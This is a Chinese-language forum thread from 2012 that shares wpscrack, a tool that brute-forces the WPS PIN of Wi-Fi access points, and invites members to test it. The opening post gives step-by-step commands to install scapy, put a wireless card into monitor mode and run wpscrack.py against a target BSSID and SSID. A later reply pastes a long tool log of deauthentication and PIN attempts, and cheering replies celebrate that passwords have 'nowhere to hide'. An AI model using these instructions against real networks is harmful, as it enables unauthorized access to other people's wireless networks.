论坛 › 无线安全深入攻防 › 喜欢测试的兄弟来吧，与reaver原理相同的另一个穷举软件wpscrack

hwfsd 发表于 2012-1-15 18:21

喜欢测试的兄弟来吧，与reaver原理相同的另一个穷举软件wpscrack

本帖最后由 hwfsd 于 2012-1-16 20:48 编辑

测试环境作者用的BackTrack 5R1， ath9k芯片的网卡，考虑到兼容性，能跟作者测试环境相同是最好的了。

ps: reaver穷举PIN是0-9999取随机数，wpscrack穷举PIN是0-9999按阿拉伯数字自然排序。

PS:我这里测试的环境跟作者相同，今天测试应该是成功了（图在2楼），但1st阶段越过了AP的真实PIN码前四位（AP真实PIN码前四位是8498，但图4显然已经越过了），由于AP卡死，没测试到最后。


闲来无聊，去wpscrack作者的blog仔细看了看http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/（需要爬墙），好多人测试都不成功，作者强调了2个细节第一：必须安装scapy2.2.0，且必须是这个版本。 第二：MAC地址的字母必须是小写。
测试的步骤：

1. 先安装scapy2.2.0

   解压进入目录python setup.py install

2. 解压 wpscrack进入目录

   airmon-ng start wlan0

   iwconfig mon0 channel X (X代表测试AP的信道)

   ./wpscrack.py --iface mon0 --client xx:xx:xx:xx:xx:xx --bssid yy:yy:yy:yy:yy:yy --ssid TESTAP --dh 0 -v

    ps： xx---自己网卡MAC地址   yy---AP的MAC地址TESTAP----AP的SSID

   欢迎测试过的兄弟反馈信息，哪怕有一个成功的也好。

郭德纲98 发表于 2017-10-25 01:01

帮LZ把贴子顶上去。顺便挣点分

hwfsd 发表于 2012-1-15 18:22

本帖最后由 hwfsd 于 2012-1-16 18:34 编辑

这是今天的测试图，前面3张一切正常。但第4张穷举越过了AP真实PIN的前4位。（真实PIN码前4位8498）

shiyizhe 发表于 2012-1-15 18:37

科学研究的道路是曲折的，我顶你，望众多高人都来发挥集体智慧！

hwfsd 发表于 2012-1-15 18:38

回复 3# shiyizhe


   测试而已，软件人家写好了的。

tkxtkx 发表于 2012-1-15 18:51

科学研究的道路是曲折的，我顶你，望众多高人都来发挥集体智慧！

zq9901 发表于 2012-1-15 18:54

先搞定小胖在来招呼你

Dj疯子 发表于 2012-1-15 19:02

看看，学习一下！

xzj888 发表于 2012-1-15 19:03

望众多高人都来发挥集体智慧！

a928574859 发表于 2012-1-15 19:17

你真好，软件不卖钱，不像其他。。。。。。。

lijun2010 发表于 2012-1-15 19:55

你真好，软件不卖钱

unwild 发表于 2012-1-16 00:15

紧跟lz的脚步 密码无处藏身:lol

bg5uv 发表于 2012-1-16 09:28

本帖最后由 bg5uv 于 2012-1-16 10:04 编辑

ubuntu+8187l没成功。不跑pin.
> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.132 seconds
------------------- attempt #69
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
<- M1
-> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.125 seconds
------------------- attempt #70
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
<- M1
-> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.119 seconds
------------------- attempt #71
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.111 seconds
------------------- attempt #72
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- M1
-> 802.11 deauthentication
attempt took 1.424 seconds
------------------- attempt #73
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.199 seconds
------------------- attempt #74
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.167 seconds
------------------- attempt #75
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.147 seconds
------------------- attempt #76
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
<- M1
-> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.124 seconds
------------------- attempt #77
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.146 seconds
------------------- attempt #78
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
<- M1
-> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.141 seconds
------------------- attempt #79
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.143 seconds
------------------- attempt #80
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
<- M1
-> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.113 seconds
------------------- attempt #81
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity

查看完整版本: 喜欢测试的兄弟来吧，与reaver原理相同的另一个穷举软件wpscrack